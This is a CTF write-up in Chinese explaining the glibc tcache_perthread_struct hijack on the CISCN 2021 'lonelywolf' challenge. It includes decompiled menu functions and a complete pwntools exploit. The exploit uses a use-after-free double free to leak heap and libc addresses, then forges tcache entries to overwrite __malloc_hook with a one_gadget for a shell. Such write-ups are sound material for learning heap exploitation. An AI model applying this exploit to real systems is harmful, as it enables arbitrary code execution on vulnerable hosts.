tcache_perthread_struct hijack

2.39 malloc.c 中的源代码：

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees. */
  uintptr_t key; // uintptr_t 就是 unsigned int，2.29 版本之前没有这个 key
} tcache_entry;

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS]; // TCACHE_MAX_BINS = 64
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

这是glibc malloc实现中的线程本地缓存（thread cache）结构
每个线程都有一个这样的结构体实例
counts数组记录每个bin中缓存的chunk数量
entries数组是指向每个bin链表头的指针数组
总共支持64个不同大小的bins

2.26 开始引入 tcache 机制。用户 malloc 一个堆块以后都会出现一个 0x250 或者 0x290 大小的非用户创建的 chunk，其实就是 tcache_perthread_struct.

例题：[CISCN 2021 初赛]lonelywolf D:\CTFExcercises\NSSCTF[CISCN 2021 初赛]lonelywolf

一道非常正统的菜单题：

unsigned __int64 add()
{
  size_t v1; // rbx
  void *v2; // rax
  size_t size; // [rsp+0h] [rbp-18h] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-10h]

  v4 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &size);
  if ( !size )
  {
    __printf_chk(1LL, "Size: ");
    __isoc99_scanf("%ld", &size);
    v1 = size;
    if ( size > 0x78 )
    {
      __printf_chk(1LL, "Too large");
    }
    else
    {
      v2 = malloc(size);
      if ( v2 )
      {
        cur_size = v1;
        cur_chunk = v2;
        puts("Done!");
      }
      else
      {
        puts("allocate failed");
      }
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

Index 必须填 0 才能正常 malloc，size 不能超过 0x78.

unsigned __int64 edit()
{
  _BYTE *v0; // rbx
  char *v1; // rbp
  __int64 v3; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-20h]

  v4 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &v3);
  if ( !v3 )
  {
    if ( cur_chunk )
    {
      __printf_chk(1LL, "Content: ");
      v0 = cur_chunk;
      if ( cur_size )
      {
        v1 = (char *)cur_chunk + cur_size;
        while ( 1 )
        {
          read(0, v0, 1uLL);                    // 每次读入一个字符
          if ( *v0 == '\n' )
            break;
          if ( ++v0 == v1 )                     // 不能超出 size
            return __readfsqword(0x28u) ^ v4;
        }
        *v0 = 0;
      }
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

只能修改当前 chunk 中的内容。

unsigned __int64 show()
{
  __int64 v1; // [rsp+0h] [rbp-18h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]

  v2 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &v1);
  if ( !v1 && cur_chunk )
    __printf_chk(1LL, "Content: %s\n", (const char *)cur_chunk);
  return __readfsqword(0x28u) ^ v2;
}

只能查看当前 chunk 的内容。

unsigned __int64 delete()
{
  __int64 idx; // [rsp+0h] [rbp-18h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]

  v2 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &idx);
  if ( !idx && cur_chunk )
    free(cur_chunk);                            // uaf
  return __readfsqword(0x28u) ^ v2;
}

只能删除当前 chunk，且存在 uaf 漏洞。

因为是老版本（libc-2.27, 2.29 以后就不能这么干了），可以通过直接改 fd 绕过校验实现 double free.

# double free
add(0x78)
delete()
edit(flat(
    b'a' * 0x10
))
delete()
show()

泄露完地址以后，关键步骤就是伪造 tcache_perthread_struct 中的 entry 项，这样就可以把堆块 malloc 到任意地址。

完整 exp：

from pwn import *

libc = ELF('/home/ponder/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')
elf = ELF('./lonelywolf')

local = 1
if local == 1:
    io = process('./lonelywolf')
else:
    io = remote("", )

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

gdb.attach(io)

def cmd(choice):
    io.sendlineafter(b'Your choice: ', str(choice).encode())
    
def add(size, idx=0):
    cmd(1)
    io.sendlineafter(b'Index: ', str(idx).encode())
    io.sendlineafter(b'Size: ', str(size).encode())
    
def edit(content, idx=0):
    cmd(2)
    io.sendlineafter(b'Index: ', str(idx).encode())
    io.sendlineafter(b'Content: ', content)
    
def show(idx=0):
    cmd(3)
    io.sendlineafter(b'Index: ', str(idx).encode())

def delete(idx=0):
    cmd(4)
    io.sendlineafter(b'Index: ', str(idx).encode())
    
def pwn():
    # double free
    add(0x78)
    delete()
    edit(flat(
        b'a' * 0x10
    ))
    delete()
    show()
    
    io.recvuntil(b'Content: ')
    leak = io.recvline()[:-1]
    heap_base = u64(leak.ljust(8, b'\x00')) - 0x260
    log.info(f'heap_base: {hex(heap_base)}')
    
    # 接下来主要方向是伪造出一个大堆块扔 unsorted bin 以此泄露 libc 基地址
    # tcache_perthread_struct 是天然 0x250 大小的堆块，我们希望把它 free 掉
    # 要进 unsorted bin 需要先做几个手续：让程序以为 tcache 0x250 的堆块已经满了（7个）
    # cur_chunk 必须指向 heap_base + 0x10
    edit(p64(heap_base + 0x10))
    add(0x78)
    add(0x78)
    edit(b'\x00' * 35 + b'\x07')  # 填充 tcache 的 7 个堆块
    delete()
    show()
    
    # pause()
    io.recvuntil(b'Content: ')
    leak = io.recvline()[:-1]
    libc_base = u64(leak.ljust(8, b'\x00')) - 0x3ebca0
    log.info(f'libc_base: {hex(libc_base)}')
    
    # edit(p64(libc_base + 0x3ebc00) * 2)
    
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    free_hook = libc_base + libc.sym['__free_hook']
    sys_addr = libc_base + libc.sym['system']
    log.info(f'malloc_hook: {hex(malloc_hook)}')
    
    # offset 计算公式
    # n_0x20 = 0
    # entry_0x20 = 0x40
    # n_size = size/16-2
    # entry_size = 0x40 + (size//16-2)*8
    
    # free_hook
    # size = 0x40
    # entry_0x40 = 0x40 + (size//16-2)*8
    # edit(b'\x00' * entry_0x40 + p64(free_hook - 8) * 2)
    # add(size)
    # edit(b"/bin/sh\x00"+p64(sys_addr))
    # delete()
    
    # malloc_hook
    one_gadgets = [0x4f29e, 0x4f2a5, 0x4f302, 0x10a2fc]
    size = 0x40
    entry_0x40 = 0x40 + (size//16-2)*8
    edit(b'\x00' * entry_0x40 + p64(malloc_hook) * 2)
    add(size)
    edit(p64(libc_base + one_gadgets[3]))
    add(size)
        
    io.interactive()

pwn()